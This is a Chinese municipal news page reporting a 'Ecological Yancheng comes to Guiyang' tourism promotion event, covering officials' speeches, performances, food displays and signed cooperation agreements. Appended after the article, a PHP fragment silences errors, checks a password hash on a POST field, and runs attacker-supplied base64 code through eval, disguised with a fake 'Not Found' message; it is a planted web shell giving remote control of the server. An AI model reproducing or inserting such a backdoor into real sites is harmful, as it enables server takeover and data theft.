工作动态

首页 > 工作动态 >

    “生态盐城走进贵阳”旅游推介会成功举行

           9月20日,“生态盐城走进贵阳”旅游推介会在贵州贵阳举行,盐城与贵阳两地旅游同仁欢聚一堂,共商合作大计。盐城市人民政府邹毅实副市长带队盐城旅游促销团成员一行来到“爽爽贵阳”,用丰富的盐城旅游主题资源、特色旅游线路和航空产品,极具江淮特色文化的歌舞及传统杂技表演、精美图片展和“八大碗”美食展等向贵阳朋友介绍了盐城的魅力,诚邀贵阳乃至贵州广大朋友们搭乘贵阳至盐城直达航班一起“感受生态之美,畅游生态盐城”。
      随着直航开通,为盐城、贵阳两地带来的不仅是便捷的出行方式,更是将“盐城,一个让人打开心扉的地方”带到了贵阳,让中国避暑之都—贵阳感受了别样的生态湿地风情。本次“生态盐城走进贵阳”推介会上,贵阳市人民政府王文祥副市长,贵阳市旅游产业发展委员会、多彩贵州航空公司和贵阳机场、贵阳市旅游行业协会等部门相关负责同志,65家贵阳旅行社负责人和8家主流新闻媒体记者应邀出席。
     
      2016《中国盐城》宣传片为推介会拉开序幕,现场嘉宾无不被盐城湿地之美所吸引。贵阳市人民政府王玉祥副市长致辞,他说:盐城是我家乡,贵阳是我第二故乡,对这两座城市都有深厚感情。两地今后在旅游、投资、创业等各方面都有广阔的合作空间,希望两地旅游企业能加大旅游文化交融,努力实现合作共赢,共同谱写产业发展新篇章。盐城市政府副市长邹毅实推介了盐城旅游主题资源,他说:首先对贵阳市王玉祥副市长8月23日在盐城举行的贵阳旅游推介表达了感谢。目前,盐城贵阳两地互动交流日趋频繁,盐城至贵阳航班上座率达到90%以上。“来而不往非礼也”,今天,将“一个让人打开心扉的地方—盐城”推介给大家。以绿色湿地、红色铁军、蓝色海港和白色海盐构筑的“四色文化”是盐城的城市特征,在地理风貌、民俗风情等方面,盐城与贵阳颇有渊源,一个滨临黄海,一个地处内陆;一个高山大川,一个一马平川;一个多民族风情,一个苏北水乡特色,迥异的风格造成了感官的差异,让两地旅游的互动有了更多潜力可以挖掘。
     
      推介会上,盐城特色歌舞《弯弯串场河》、《一个真实的故事》和传统杂技《肩上芭蕾》、旅游宣传片《盐城,一个让人打开心扉的地方》、盐城旅游资源主题推介、“东方湿地,鹤鹿故乡”生态三日游产品推介等内容精彩上演,引得与会嘉宾赞叹不已。而互动抽奖环节将推介会推向高潮,东台、大丰、建湖、盐都和城南新区等县(市、区)带来了丝巾、水浒邮册、花茶、旅游风光绢帛画和LED便携旅游灯等抽奖奖品极具地方特色,让贵阳朋友感受“盐城”魅力的同时将美丽“盐城”带回家。此外,现场举行的盐城旅游图片展、盐城“八大碗”美食展示,吸引了大家的热情关注,一幅幅精美的盐城风光图片,一道道让人垂涎欲滴的八大碗仿真菜,让人享受了一场绚丽的“视觉盛宴”。
     
      会上,盐城市旅游局与贵阳市旅游局交换了《合作框架协议》文本,盐城市旅游行业协会与贵阳市旅游行业协会交换《旅游客源输送合作协议》文本。合作协议的签订,为促进两座城市在航空旅游方面的联动发展带来了有力支撑。
     
      随着两地距离被直航拉近,今后贵阳游客朋友可以极其便捷的来盐做“深呼吸”、赏美景、品美食,感受盐城独具魅力的湿地之美。
     
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>